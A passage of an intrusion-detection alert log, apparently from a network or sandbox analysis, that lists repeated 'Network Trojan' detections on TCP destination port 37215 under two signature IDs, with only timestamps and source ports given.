              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975071
              SID:2835222
              Source Port:43592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728616
              SID:2835222
              Source Port:39672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785878
              SID:2829579
              Source Port:57360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307849
              SID:2835222
              Source Port:46626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457905
              SID:2829579
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695199
              SID:2829579
              Source Port:47760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263126
              SID:2829579
              Source Port:35916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632989
              SID:2835222
              Source Port:42164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436997
              SID:2835222
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990460
              SID:2829579
              Source Port:50264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370670
              SID:2829579
              Source Port:33770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488807
              SID:2829579
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192271
              SID:2829579
              Source Port:49738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657997
              SID:2835222
              Source Port:51494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610371
              SID:2835222
              Source Port:42794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192684
              SID:2829579
              Source Port:37218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509214
              SID:2829579
              Source Port:37634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012882
              SID:2829579
              Source Port:42464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406769
              SID:2829579
              Source Port:45152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546746
              SID:2835222
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753736
              SID:2835222
              Source Port:38232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214209
              SID:2829579
              Source Port:33256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228672
              SID:2835222
              Source Port:47618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635770
              SID:2829579
              Source Port:59536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350786
              SID:2835222
              Source Port:52752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253350
              SID:2835222
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088985
              SID:2829579
              Source Port:40612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300862
              SID:2829579
              Source Port:48506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452811
              SID:2829579
              Source Port:44524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456277
              SID:2829579
              Source Port:46814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749550
              SID:2829579
              Source Port:36280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564706
              SID:2835222
              Source Port:58296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607135
              SID:2835222
              Source Port:42570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377060
              SID:2835222
              Source Port:56734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868175
              SID:2829579
              Source Port:46826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194516
              SID:2829579
              Source Port:37284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213129
              SID:2835222
              Source Port:40834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455214
              SID:2835222
              Source Port:56586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404379
              SID:2835222
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749072
              SID:2829579
              Source Port:59308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450363
              SID:2829579
              Source Port:52958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109991
              SID:2835222
              Source Port:52564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044524
              SID:2835222
              Source Port:44600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155933
              SID:2829579
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156417
              SID:2835222
              Source Port:35050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656895
              SID:2835222
              Source Port:55160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708877
              SID:2835222
              Source Port:49698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266901
              SID:2835222
              Source Port:43562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725125
              SID:2829579
              Source Port:39072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866112
              SID:2835222
              Source Port:56574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013277
              SID:2829579
              Source Port:49526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091384
              SID:2835222
              Source Port:54666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245389
              SID:2829579
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027361
              SID:2835222
              Source Port:39222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229628
              SID:2829579
              Source Port:45992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678815
              SID:2829579
              Source Port:47466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458062
              SID:2829579
              Source Port:38700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041276
              SID:2829579
              Source Port:60774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841704
              SID:2835222
              Source Port:52238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252558
              SID:2829579
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369839
              SID:2835222
              Source Port:49480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456241
              SID:2835222
              Source Port:50252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993361
              SID:2835222
              Source Port:48636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978215
              SID:2835222
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217517
              SID:2835222
              Source Port:36874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079544
              SID:2829579
              Source Port:39918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356806
              SID:2829579
              Source Port:34074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751906
              SID:2829579
              Source Port:46354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695819
              SID:2835222
              Source Port:38922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057978
              SID:2835222
              Source Port:58054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800248
              SID:2835222
              Source Port:57178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709644
              SID:2829579
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995259
              SID:2829579
              Source Port:56554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820695
              SID:2829579
              Source Port:33452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056271
              SID:2829579
              Source Port:55474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040241
              SID:2829579
              Source Port:54854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833472
              SID:2835222
              Source Port:54084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615777
              SID:2829579
              Source Port:38846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308159
              SID:2829579
              Source Port:49560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553984
              SID:2835222
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274054
              SID:2835222
              Source Port:55342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724987
              SID:2835222
              Source Port:43252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835979
              SID:2835222
              Source Port:54050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177275
              SID:2829579
              Source Port:58346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632189
              SID:2835222
              Source Port:58922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304400
              SID:2829579
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350508
              SID:2829579
              Source Port:50742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168616
              SID:2835222
              Source Port:53526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756139
              SID:2829579
              Source Port:46164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123787
              SID:2829579
              Source Port:49744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566467
              SID:2835222
              Source Port:59586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572395
              SID:2829579
              Source Port:58944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229112
              SID:2835222
              Source Port:55194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942481
              SID:2829579
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174708
              SID:2835222
              Source Port:58584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610432
              SID:2829579
              Source Port:41372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212152
              SID:2829579
              Source Port:35392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198678
              SID:2829579
              Source Port:44694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370923
              SID:2829579
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952581
              SID:2829579
              Source Port:41300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943047
              SID:2829579
              Source Port:34626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866764
              SID:2829579
              Source Port:57160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354114
              SID:2829579
              Source Port:54030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569448
              SID:2829579
              Source Port:56282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419577
              SID:2835222
              Source Port:48340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437506
              SID:2835222
              Source Port:46518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100202
              SID:2829579
              Source Port:50488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914510
              SID:2829579
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257623
              SID:2835222
              Source Port:60758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266163
              SID:2835222
              Source Port:57582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697227
              SID:2835222
              Source Port:58776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486117
              SID:2829579
              Source Port:36150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888117
              SID:2835222
              Source Port:47958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754398
              SID:2829579
              Source Port:59426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318099
              SID:2829579
              Source Port:47476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417464
              SID:2835222
              Source Port:52938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784162
              SID:2835222
              Source Port:46558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841506
              SID:2835222
              Source Port:37022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457149
              SID:2835222
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101896
              SID:2829579
              Source Port:39268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154198
              SID:2829579
              Source Port:40472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417899
              SID:2829579
              Source Port:52010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358349
              SID:2829579
              Source Port:37638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439310
              SID:2829579
              Source Port:41658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784051
              SID:2829579
              Source Port:58002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276239
              SID:2835222
              Source Port:34078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304691
              SID:2835222
              Source Port:56820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802783
              SID:2835222
              Source Port:52206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660671
              SID:2835222
              Source Port:57974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992777
              SID:2829579
              Source Port:53858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802020
              SID:2835222
              Source Port:34464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093007
              SID:2829579
              Source Port:41214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348552
              SID:2829579
              Source Port:53824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708574
              SID:2829579
              Source Port:45924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346648
              SID:2829579
              Source Port:33974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954515
              SID:2829579
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213392
              SID:2835222
              Source Port:44404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042545
              SID:2829579
              Source Port:43144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247730
              SID:2835222
              Source Port:40900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555858
              SID:2829579
              Source Port:58860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094157
              SID:2829579
              Source Port:34624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354477
              SID:2835222
              Source Port:52178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727208
              SID:2835222
              Source Port:46530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610400
              SID:2829579
              Source Port:52018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460237
              SID:2829579
              Source Port:44584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134430
              SID:2835222
              Source Port:39068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011269
              SID:2829579
              Source Port:51018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456966
              SID:2835222
              Source Port:41752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344267
              SID:2829579
              Source Port:43350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571851
              SID:2835222
              Source Port:54584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151621
              SID:2829579
              Source Port:60002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094845
              SID:2835222
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174752
              SID:2829579
              Source Port:41758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077653
              SID:2835222
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349890
              SID:2829579
              Source Port:39540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869088
              SID:2829579
              Source Port:55048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787718
              SID:2829579
              Source Port:60436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135911
              SID:2835222
              Source Port:50122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275726
              SID:2835222
              Source Port:42428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255895
              SID:2835222
              Source Port:42520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345802
              SID:2835222
              Source Port:36444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377851
              SID:2829579
              Source Port:40064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824451
              SID:2835222
              Source Port:57256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611125
              SID:2829579
              Source Port:44134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407594
              SID:2835222
              Source Port:57856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176156
              SID:2829579
              Source Port:60920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554804
              SID:2829579
              Source Port:48134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230114
              SID:2835222
              Source Port:57754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374173
              SID:2829579
              Source Port:49092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132273
              SID:2829579
              Source Port:52152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316042
              SID:2829579
              Source Port:60324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157111
              SID:2829579
              Source Port:51398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989823
              SID:2829579
              Source Port:48246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353261
              SID:2829579
              Source Port:39746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546537
              SID:2829579
              Source Port:32834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093957
              SID:2835222
              Source Port:47220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610843
              SID:2835222
              Source Port:43030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057286
              SID:2829579
              Source Port:39458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135509
              SID:2829579
              Source Port:49210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212017
              SID:2829579
              Source Port:34644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222065
              SID:2835222
              Source Port:35308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696398
              SID:2829579
              Source Port:51072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784535
              SID:2829579
              Source Port:56894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872200
              SID:2829579
              Source Port:36378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128685
              SID:2835222
              Source Port:58062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612499
              SID:2835222
              Source Port:46546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214388
              SID:2829579
              Source Port:54138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997365
              SID:2829579
              Source Port:39610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213677
              SID:2829579
              Source Port:33440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659622
              SID:2829579
              Source Port:36220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238209
              SID:2829579
              Source Port:54852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213781
              SID:2835222
              Source Port:59456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243280
              SID:2829579
              Source Port:50324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754069
              SID:2829579
              Source Port:38314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488500
              SID:2835222
              Source Port:39418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323966
              SID:2835222
              Source Port:36332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214157
              SID:2835222
              Source Port:35926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
